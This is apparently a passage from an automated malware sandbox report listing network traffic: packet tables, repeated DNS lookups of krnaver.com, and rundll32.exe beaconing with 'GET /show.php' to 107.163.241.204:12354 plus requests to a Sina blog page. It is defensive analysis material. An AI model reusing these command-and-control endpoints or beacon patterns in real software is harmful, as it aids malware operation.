                                                      Dec 11, 2024 16:27:32.618478060 CET6353180192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:32.622436047 CET1235463434107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:32.622512102 CET6343412354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:32.623246908 CET6343412354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:32.735924006 CET1235463529107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:32.736032009 CET6352912354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:32.736630917 CET6352912354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:32.738275051 CET8063531202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:32.738354921 CET6353180192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:32.738548994 CET6353180192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:32.743441105 CET1235463434107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:32.856437922 CET1235463529107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:32.858098984 CET8063531202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:34.301805019 CET8063531202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:34.301863909 CET6353180192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:34.307095051 CET64509443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:34.307142019 CET44364509202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:34.307203054 CET64509443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:34.308717012 CET64509443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:34.308737040 CET44364509202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:34.737932920 CET1235463434107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:34.738009930 CET6343412354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:34.738527060 CET6343412354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:34.738835096 CET6482812354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:34.846604109 CET1235463529107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:34.846803904 CET6352912354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:34.848519087 CET6352912354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:34.849250078 CET6497112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:34.859358072 CET1235463434107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:34.859982014 CET1235464828107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:34.860121012 CET6482812354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:34.860810995 CET6482812354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:34.968209028 CET1235463529107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:34.969588041 CET1235464971107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:34.969657898 CET6497112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:34.981868029 CET1235464828107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:34.983956099 CET6497112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:35.103260994 CET1235464971107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:36.002574921 CET44364509202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:36.002641916 CET64509443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:36.003448009 CET44364509202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:36.003493071 CET64509443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:36.014420033 CET64509443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:36.014475107 CET44364509202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:36.014594078 CET64509443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:36.135368109 CET6353180192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:36.135481119 CET4998180192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:36.254873991 CET8049981202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:36.254976034 CET4998180192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:36.255119085 CET8063531202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:36.255297899 CET6353180192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:36.255453110 CET4998180192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:36.374912024 CET8049981202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:36.517472029 CET6497112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:36.517659903 CET4998180192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:36.517667055 CET6482812354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:36.518881083 CET5039612354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:36.633157015 CET5046580192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:36.634855032 CET5046712354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:36.639888048 CET1235450396107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:36.639969110 CET5039612354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:36.640381098 CET5039612354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:36.756345034 CET8050465202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:36.756433010 CET5046580192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:36.757864952 CET1235450467107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:36.757925987 CET5046712354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:36.760688066 CET5046580192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:36.761255026 CET5046712354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:36.761501074 CET1235450396107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:36.880317926 CET8050465202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:36.880611897 CET1235450467107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:38.319008112 CET8050465202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:38.320425034 CET5046580192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:38.324347019 CET51516443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:38.324376106 CET44351516202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:38.324883938 CET51516443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:38.328398943 CET51516443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:38.328412056 CET44351516202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:38.752511978 CET1235450396107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:38.760324955 CET5039612354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:38.763392925 CET5039612354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:38.764007092 CET5186412354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:38.863106966 CET1235450467107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:38.863199949 CET5046712354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:38.863811016 CET5046712354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:38.880125999 CET5200012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:38.883133888 CET1235450396107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:38.883800030 CET1235451864107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:38.888731956 CET5186412354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:38.888751984 CET5186412354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:38.983088970 CET1235450467107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:38.999530077 CET1235452000107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:38.999629021 CET5200012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:39.000065088 CET5200012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:39.008443117 CET1235451864107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:39.119822025 CET1235452000107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:40.032223940 CET44351516202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:40.032390118 CET51516443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:40.033023119 CET44351516202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:40.033071041 CET51516443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:40.037102938 CET51516443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:40.037205935 CET44351516202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:40.037266016 CET51516443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:40.145880938 CET5046580192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:40.146152973 CET5331380192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:40.269108057 CET8053313202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:40.269177914 CET5331380192.168.2.9202.108.0.52
Timestamp    Source Port    Dest Port    Source IP    Dest IP
Timestamp    Source IP    Dest IP    Trans ID    OP Code    Name    Type    Class    DNS over HTTPS
                                                      Dec 11, 2024 16:26:28.034754038 CET192.168.2.91.1.1.10xe63dStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:26:33.034229994 CET192.168.2.91.1.1.10x7716Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:26:38.033224106 CET192.168.2.91.1.1.10xd245Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:26:43.044070005 CET192.168.2.91.1.1.10x77d7Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:26:48.123034954 CET192.168.2.91.1.1.10xf21eStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:26:53.033762932 CET192.168.2.91.1.1.10xe89eStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:26:58.087189913 CET192.168.2.91.1.1.10xd218Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:27:03.033389091 CET192.168.2.91.1.1.10x79bcStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:27:04.398503065 CET192.168.2.91.1.1.10x93ecStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:27:08.033149958 CET192.168.2.91.1.1.10x5659Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:27:13.033689976 CET192.168.2.91.1.1.10xe6eeStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:27:18.033071041 CET192.168.2.91.1.1.10x351bStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:27:23.033158064 CET192.168.2.91.1.1.10x8553Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:27:28.035818100 CET192.168.2.91.1.1.10x75b1Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:27:33.033041954 CET192.168.2.91.1.1.10xc5f7Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:27:38.036232948 CET192.168.2.91.1.1.10xca72Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:27:43.033835888 CET192.168.2.91.1.1.10xc0e4Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:27:48.038427114 CET192.168.2.91.1.1.10xeed6Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                      Dec 11, 2024 16:23:40.049406052 CET | 1.1.1.1 | 192.168.2.9 | 0xd84b | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
                                                      Dec 11, 2024 16:23:40.049406052 CET | 1.1.1.1 | 192.168.2.9 | 0xd84b | No error (0) | s-part-0035.t-0009.t-msedge.net |  | 13.107.246.63 | A (IP address) | IN (0x0001) | false
                                                      Dec 11, 2024 16:23:55.108138084 CET | 1.1.1.1 | 192.168.2.9 | 0x9502 | No error (0) | blog.sina.com.cn | blogx.sina.com.cn |  | CNAME (Canonical name) | IN (0x0001) | false
                                                      Dec 11, 2024 16:23:55.108138084 CET | 1.1.1.1 | 192.168.2.9 | 0x9502 | No error (0) | blogx.sina.com.cn |  | 202.108.0.52 | A (IP address) | IN (0x0001) | false
                                                      Dec 11, 2024 16:27:04.536482096 CET | 1.1.1.1 | 192.168.2.9 | 0x93ec | No error (0) | blog.sina.com.cn | blogx.sina.com.cn |  | CNAME (Canonical name) | IN (0x0001) | false
                                                      Dec 11, 2024 16:27:04.536482096 CET | 1.1.1.1 | 192.168.2.9 | 0x93ec | No error (0) | blogx.sina.com.cn |  | 202.108.0.52 | A (IP address) | IN (0x0001) | false
                                                      • blog.sina.com.cn
                                                      • 107.163.241.204:12354
                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      0 | 192.168.2.9 | 49750 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:23:51.775649071 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      1 | 192.168.2.9 | 49751 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:23:51.775754929 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      2 | 192.168.2.9 | 49772 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:23:54.125768900 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      3 | 192.168.2.9 | 49773 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:23:54.125861883 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      4 | 192.168.2.9 | 49784 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:23:55.231003046 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:23:56.789465904 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:23:56 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      5 | 192.168.2.9 | 49796 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:23:56.484150887 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      6 | 192.168.2.9 | 49798 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:23:56.671241045 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      7 | 192.168.2.9 | 49814 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:23:58.139686108 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      8 | 192.168.2.9 | 49815 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:23:58.322012901 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      9 | 192.168.2.9 | 49816 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:23:58.323337078 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:23:59.828609943 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:23:59 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      10 | 192.168.2.9 | 49840 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:00.375739098 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      11 | 192.168.2.9 | 49842 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:00.503346920 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      12 | 192.168.2.9 | 49857 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:02.138027906 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      13 | 192.168.2.9 | 49859 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:02.292270899 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:03.868853092 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:03 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      14 | 192.168.2.9 | 49860 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:02.292548895 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      15 | 192.168.2.9 | 49884 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:04.405234098 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      16 | 192.168.2.9 | 49887 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:04.542387962 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      17 | 192.168.2.9 | 49903 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:06.152331114 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache
                                                      Dec 11, 2024 16:25:59.666007996 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      18 | 192.168.2.9 | 49905 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:06.274705887 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      19 | 192.168.2.9 | 49906 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:06.345331907 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:08.003690958 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:07 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      20 | 192.168.2.9 | 49929 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:08.387660980 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      21 | 192.168.2.9 | 49932 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:08.515805960 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      22 | 192.168.2.9 | 49952 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:10.281122923 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      23 | 192.168.2.9 | 49954 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:10.395219088 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:12.056432962 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:11 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      24 | 192.168.2.9 | 49955 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
